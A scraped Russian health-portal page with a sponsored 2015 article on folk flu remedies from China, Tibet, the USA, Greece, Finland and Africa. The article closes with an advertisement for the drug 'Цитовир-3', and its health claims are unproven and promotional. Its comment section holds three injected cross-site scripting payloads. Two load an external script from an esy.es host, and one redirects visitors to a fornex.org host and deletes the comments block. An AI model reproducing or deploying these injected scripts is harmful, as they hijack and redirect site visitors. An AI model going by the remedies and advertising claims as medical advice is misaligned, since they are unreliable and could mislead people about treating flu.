Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  А в России правильно леча...  >>  А в России правильно лечат грипп?
 
Обратная связь
 

А в России правильно лечат грипп?

Размер шрифта
26 февраля 2015 00:00
  • google_analytics: false
  • Нравится

Как говорится, «грипп – он и в Африке грипп», ведь даже на этом жарком континенте периодически бушуют эпидемии.  Из-за такой распространенности простудных заболеваний их научились лечить во всем мире, но в каждой стране по-разному.

Как лечат грипп и ОРВИ в разных странах

Китай

Острые респираторные вирусные инфекции, грипп, да и большинство других заболеваний в Китае издревле лечили с помощью оздоровительных массажей и иглоукалывании. Для лечения используют и различные отвары. Самым популярным считается рецепт, согласно которому необходимо нарезать шесть луковиц (зеленого лука), перемешать их с четвертью стакана коричневого тростникового сахара и залить полученную смесь двумя стаканами воды. После чего поставить кастрюлю с этими ингредиентами на огонь и довести до кипения. Далее емкость снимают с огня, достают лук и добавляют в смесь белок куриного яйца. Отвар разделяют на три части и пьют в течение дня: утром, в обед и вечером.

Тибет

Как известно, в этом китайском регионе медицина особенная. Тибетские ламы славятся своим крепким здоровьем, которое, как многие считают, стало практически неуязвимым для гриппа и простуды благодаря постоянным физическим упражнениям. На самом деле у них есть свой маленький секрет для сильного иммунитета. Раз в пять лет тибетцы готовят настойку из чеснока на спирту и выпивают ее вместе с молоком. Поговаривают, что такая ядреная смесь может защищать организм в течение нескольких лет.

США

Несмотря на то, что часть жителей этой страны живет на жарких побережьях, простуды там тоже не редкость, поэтому есть и своя народная медицина. Так, жители Калифорнии при первых же признаках простуды готовят себе интересный напиток из лимонного сока, мятной настойки, меда и чеснока.
Для его приготовления нужно взять чайную ложку сухих листьев мяты, залить их стаканом кипятка, добавить мелкопорезанный зубчик чеснока, чайную ложку меда и четверть лимона. Пить этот коктейль рекомендуется на ночь.

Греция

Главным профилактическим средством в этой стране считается так называемый «напиток Гиппократа». Он не только приносит пользу организму, но и довольно приятен на вкус, что и обуславливает его высокую популярность. Готовить настой очень просто: нужно пару ломтиков лимона или апельсина залить двумя стаканами красного вина, добавить туда две палочки корицы, чайную ложку меда и щепотку гвоздики. Получившуюся смесь доводят до кипения и пьют исключительно на ночь и маленькими глотками.

Финляндия

Крепкие финские парни и девушки оказываются тоже подвержены простудам. Чтобы избежать эпидемии они ходят в баню, где пьют большое количество потогонного чая. Для вкуса в него добавляют различные ягоды: смородина, клюква, малина, брусника или ирга. Если же по каким-либо причинам потогонный чай противопоказан, финны заваривают специальный настой из липового цвета, листьев вишни, смородины и мяты.

Африка

Всем хорошо известно, что уровень медицины на этом континенте довольно низок, поэтому большая часть населения до сих пор во время простуды обращается к рецептам народной медицины. Чаще всего в целях профилактики или при первых признаках болезни люди начинают принимать настойку из алоэ. Сделать ее довольно просто: необходимо несколько дней не поливать цветок, потом срезать его нижние листья и прокрутить их мясорубке. После чего массу отжимают, а полученный сок смешивают с кагором и медом. Полученную смесь нужно поставить в холодное место на пару дней, а потом принимать ее по одной столовой ложке трижды в сутки за полчаса до приема пищи.

Россия

Россия славится своими рецептами в области народной медицины. Многие века наши люди лечились с помощью отваров, настроек, мазей и даже заговоров.  В настоящее время жители нашей страны больше доверяют лекарственным средствам для борьбы с гриппом и ОРВИ, нежели бабушкиным рецептам. Например, иммуномодулирующий препарат «Цитовир-3» уже много лет помогает взрослым и детям в профилактике и лечении простуды. Принимать его нужно всего четыре дня, а купить можно в любой аптеке, что намного удобнее, чем собирать летом различные травы и потом варить из них зелье, которое к тому же не только может оказаться бесполезным, но еще и принести вред в виде аллергии. Кстати, чтобы избежать аллергических реакций детям от года лучше давать «Цитовир-3» в форме порошка для разведения суспензии, который будет безопасен даже для атопиков.

Будьте здоровы!

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:18

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Частые ОРВИ у ребёнка. Как быть?   Мифы о простуде, которым пора положить конец!   Одно лекарство не даст вам умереть от гриппа!   Можно ли лечить грипп антибиотиками  
03 сентября 2012Опасный вирус убивает стафилококк, против которого бессильны лекарства! 24 августа 2012Домашний тест на ВИЧ
 
21 сентября 2012ВИЧ полезен в борьбе с раком! 12 июля 2012Грудное молоко предотвращает передачу ВИЧ
 

Слайдшоу

1
Как избавиться от больного горла?
Как не позволить простуде заразить ваших близких
Врачи против параллельного мира

Тесты

1
Что вы знаете о пневмонии?
Почему болит горло?
Я и моя защита от инфекций
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.